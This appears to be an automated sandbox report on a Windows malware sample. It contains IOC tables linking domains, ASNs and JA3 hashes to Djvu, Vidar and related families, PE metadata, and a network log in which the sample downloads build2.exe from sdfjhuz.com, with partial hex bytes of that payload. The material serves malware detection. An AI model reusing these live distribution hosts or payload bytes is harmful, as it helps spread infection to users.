	3CB27VUHRg.exe	Get hash	malicious	Babuk, Djvu	Browse	81.183.132.103
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	58.151.148.90
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	211.181.24.132
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.195.132.134
sdfjhuz.com	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	211.181.24.132
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	211.181.24.133
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	175.119.10.231
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	186.147.159.149
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	123.140.161.243
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	186.13.17.220
	3CB27VUHRg.exe	Get hash	malicious	Babuk, Djvu	Browse	211.181.24.132
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	190.218.33.18
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.232.19.193
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	187.228.55.117
steamcommunity.com	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	23.65.44.84
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	184.85.65.125
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.66.133.162
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.66.133.162
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	184.30.90.143
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.59.200.146
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.106.57.101
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.76.43.59
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.67.208.180
api.2ip.ua	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	104.21.65.24
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.65.24
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	172.67.139.220
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.65.24
	3CB27VUHRg.exe	Get hash	malicious	Babuk, Djvu	Browse	172.67.139.220
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.65.24
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	23.65.44.84
	https://i.imgur.com/EoTj4iI.png	Get hash	malicious	Unknown	Browse	184.28.252.71
	https://i.imgur.com/VlAllek.png	Get hash	malicious	Unknown	Browse	184.28.252.71
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	184.85.65.125
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.66.133.162
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.66.133.162
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	184.30.90.143
	https://tibusiness.cl/css/causarol.rar	Get hash	malicious	Unknown	Browse	23.217.9.75
	http://damarltda.cl/certificado.php	Get hash	malicious	Unknown	Browse	23.200.60.110
HETZNER-ASDE	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	95.217.9.149
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	95.217.9.149
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
DIG001JM	wn1gncGy2T.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	63.143.98.185
	MT5Um6Ykrl.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	63.143.98.185
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	63.143.98.185
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, SmokeLoader, zgRAT	Browse	63.143.98.185
	6FQG7ckQYK.elf	Get hash	malicious	Mirai	Browse	173.225.253.190
	skyljne.arm.elf	Get hash	malicious	Mirai	Browse	162.212.14.155
	aILzoYwXdz.elf	Get hash	malicious	Mirai	Browse	162.212.14.122
	Yezm5vmBl5.elf	Get hash	malicious	Unknown	Browse	63.143.96.103
	xfzak0pHUR.elf	Get hash	malicious	Mirai	Browse	173.225.253.199
	uWm8uShWOM.elf	Get hash	malicious	Unknown	Browse	162.212.14.139
UninetSAdeCVMX	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	189.232.19.193
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.163.142.13
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.232.19.193
	957C4XK6Lt.exe	Get hash	malicious	Phorpiex	Browse	189.190.10.16
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.245.19.217
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.232.19.193
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	187.228.55.117
	oVOImRIAaz.elf	Get hash	malicious	Mirai	Browse	201.129.243.137
	xzk9TKqNoI.elf	Get hash	malicious	Mirai	Browse	148.227.200.233
	sora.arm.elf	Get hash	malicious	Mirai	Browse	201.155.131.147

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	95.217.9.149
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	95.217.9.149
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	104.21.65.24 184.85.65.125
	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	104.21.65.24 184.85.65.125
	107. PN-EN-1090-2+A1_2012P.exe	Get hash	malicious	GuLoader, Remcos	Browse	104.21.65.24 184.85.65.125
	BM-FM_NR.24040718PDF.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.65.24 184.85.65.125
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.65.24 184.85.65.125
	IPrstVM17M.exe	Get hash	malicious	Unknown	Browse	104.21.65.24 184.85.65.125
	IPrstVM17M.exe	Get hash	malicious	Unknown	Browse	104.21.65.24 184.85.65.125
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.65.24 184.85.65.125
	Zapytanie ofertowe Fl#U00e4ktGroup 04232024.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.65.24 184.85.65.125
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	104.21.65.24 184.85.65.125

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\build2[1].exe	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse
	3CB27VUHRg.exe	Get hash	malicious	Babuk, Djvu	Browse
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	8xFzJWrEIa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqln[1].dll	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse

Process:	C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Desktop\sIQywRNC5M.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	780288
Entropy (8bit):	7.7023702170367745
Encrypted:	false
SSDEEP:	12288:e2ZPFVL/YNfMNwpo4id34UcFg522Af3mhQIDBYHJD9wICzXXRXGoKU:e2tcMNqo3/c+52TvsQ0CjCdKU
MD5:	03CEA6F6022A3A08D1EA003091A3E502
SHA1:	643E34573258D1511921C8D97A5B3C26D6C70B62
SHA-256:	2F48E39C1FA623B569C7580066026DC25E629FCD4A9CDB8A58D22E45C9EB99C2
SHA-512:	560EC4D84A74B9089D12A6E00B02ACB8FA1364F75172A2FD0916C030350FF9FE32EA137A3FDD8DF3648870C82935131FDEE9DE6D00066D97F9D073CF85648E42
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42% Antivirus: Virustotal, Detection: 42%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%G.a&..a&..a&..lt`.\|&..lt_..&..lt^.M&..h^,.f&..a&...&...Z.`&..ltd.`&...a.`&..Richa&..........PE..L...Yp.d............................O?............@.................................D...........................................P.......................................8...............................@............................................text...x........................... ..`.rdata..p...........................@..@.data....]..........................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

Entrypoint:	0x403f4f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64EC7059 [Mon Aug 28 10:00:57 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0c221599ea7b9c4f042cfb23a69ed3b1

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18d84	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3ca0000	0xd808	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x111f0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x182b8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xfd78	0xfe00	3aed5ae009f3fccbbb316ef19dc26c51	False	0.6032388041338582	data	6.7189553153773325	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x11000	0x8670	0x8800	b6b2998f2203a8b62daeb4ab25d60ba0	False	0.44970703125	data	5.073925543788201	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x3c85de0	0x98400	c895f2f44dd2cb6258e40c69889048e4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3ca0000	0xd808	0xda00	86e95c959779bb4d9692740174003f7d	False	0.508170871559633	data	5.403669732743524	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x3cace68	0xe	data			1.5714285714285714
AFX_DIALOG_LAYOUT	0x3cace78	0xe	data			1.5714285714285714
RT_ICON	0x3ca04d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.5666311300639659
RT_ICON	0x3ca1378	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.5482851985559567
RT_ICON	0x3ca1c20	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.6184971098265896
RT_ICON	0x3ca2188	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.4641078838174274
RT_ICON	0x3ca4730	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.4896810506566604
RT_ICON	0x3ca57d8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.49508196721311476
RT_ICON	0x3ca6160	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.4521276595744681
RT_ICON	0x3ca6630	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.4189765458422175
RT_ICON	0x3ca74d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.47653429602888087
RT_ICON	0x3ca7d80	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Romanian	Romania	0.5766129032258065
RT_ICON	0x3ca8448	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.47760115606936415
RT_ICON	0x3ca89b0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.46898340248962656
RT_ICON	0x3caaf58	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.4842870544090056
RT_ICON	0x3cac000	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.5024590163934426
RT_ICON	0x3cac988	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.5593971631205674
RT_STRING	0x3cad070	0x3d2	data	Romanian	Romania	0.46319018404907975
RT_STRING	0x3cad448	0x3bc	data	Romanian	Romania	0.4592050209205021
RT_GROUP_ICON	0x3ca65c8	0x68	data	Romanian	Romania	0.6923076923076923
RT_GROUP_ICON	0x3cacdf0	0x76	data	Romanian	Romania	0.6779661016949152
RT_VERSION	0x3cace88	0x1e4	data			0.5392561983471075

DLL	Import
KERNEL32.dll	LocalCompact, GetComputerNameW, CreateHardLinkA, BackupSeek, GetTickCount, GetConsoleAliasesA, EnumTimeFormatsA, GetUserDefaultLangID, SetCommState, LoadLibraryW, GetLocaleInfoW, ReadConsoleInputA, WriteConsoleW, MultiByteToWideChar, GetTempPathW, InterlockedExchange, GetLastError, ChangeTimerQueueTimer, SetLastError, FindResourceExW, GetProcAddress, SetFileAttributesA, BuildCommDCBW, LoadLibraryA, LocalAlloc, GetExitCodeThread, AddAtomW, RemoveDirectoryW, GlobalFindAtomW, GetModuleFileNameA, GetOEMCP, GlobalUnWire, LoadLibraryExA, SetCalendarInfoA, GetWindowsDirectoryW, GetConsoleProcessList, GetVolumeInformationW, GetThreadLocale, GetSystemDefaultLangID, GetStringTypeW, OutputDebugStringW, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, HeapFree, HeapAlloc, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, CloseHandle, GetCurrentThreadId, GetProcessHeap, WriteFile, GetModuleFileNameW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LoadLibraryExW, IsValidCodePage, GetACP, GetCPInfo, HeapReAlloc, LCMapStringW, GetConsoleCP, GetConsoleMode, SetFilePointerEx, SetStdHandle, FlushFileBuffers, CreateFileW
ADVAPI32.dll	DeregisterEventSource
WINHTTP.dll	WinHttpOpen

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 14:46:59.897699118 CEST	55805	53	192.168.2.5	1.1.1.1
Apr 24, 2024 14:47:00.061558008 CEST	53	55805	1.1.1.1	192.168.2.5
Apr 24, 2024 14:47:03.556408882 CEST	58100	53	192.168.2.5	1.1.1.1
Apr 24, 2024 14:47:03.557019949 CEST	60680	53	192.168.2.5	1.1.1.1
Apr 24, 2024 14:47:04.541038990 CEST	58100	53	192.168.2.5	1.1.1.1
Apr 24, 2024 14:47:04.556607962 CEST	60680	53	192.168.2.5	1.1.1.1
Apr 24, 2024 14:47:05.556586027 CEST	58100	53	192.168.2.5	1.1.1.1
Apr 24, 2024 14:47:05.572263002 CEST	60680	53	192.168.2.5	1.1.1.1
Apr 24, 2024 14:47:05.619175911 CEST	53	60680	1.1.1.1	192.168.2.5
Apr 24, 2024 14:47:05.619338989 CEST	53	60680	1.1.1.1	192.168.2.5
Apr 24, 2024 14:47:05.725636005 CEST	53	60680	1.1.1.1	192.168.2.5
Apr 24, 2024 14:47:05.826222897 CEST	53	58100	1.1.1.1	192.168.2.5
Apr 24, 2024 14:47:05.826242924 CEST	53	58100	1.1.1.1	192.168.2.5
Apr 24, 2024 14:47:05.826296091 CEST	53	58100	1.1.1.1	192.168.2.5
Apr 24, 2024 14:47:08.259358883 CEST	52217	53	192.168.2.5	1.1.1.1
Apr 24, 2024 14:47:08.412872076 CEST	53	52217	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 14:47:05.824651003 CEST	91	OUT	GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: sdfjhuz.com
Apr 24, 2024 14:47:06.462043047 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 12:47:06 GMT Content-Type: application/octet-stream Content-Length: 296448 Last-Modified: Tue, 23 Apr 2024 19:19:16 GMT Connection: close ETag: "662809b4-48600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 0c 25 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$oPQ#?)Uk?)nRichPELGc0`m@@0ajd@`f8@`@.text `.rdataPtv@@.data^6`@.rsrcf@`@@%
Apr 24, 2024 14:47:06.462100029 CEST	1289	IN	Data Raw: a0 01 e8 4e 02 00 00 68 09 f4 40 00 e8 3f 26 00 00 59 c3 b9 14 25 a0 01 e8 a1 02 00 00 68 ff f3 40 00 e8 29 26 00 00 59 c3 b9 00 25 a0 01 e8 f8 02 00 00 68 f5 f3 40 00 e8 13 26 00 00 59 c3 6a 00 b9 08 25 a0 01 e8 ee 00 00 00 c3 6a 00 b9 fc 24 a0 Data Ascii: Nh@?&Y%h@)&Y%h@&Yj%j$j%j%UQQQQ$!]EYY]UVEP,A^],ANUVEtV%Y^]UE]UE8
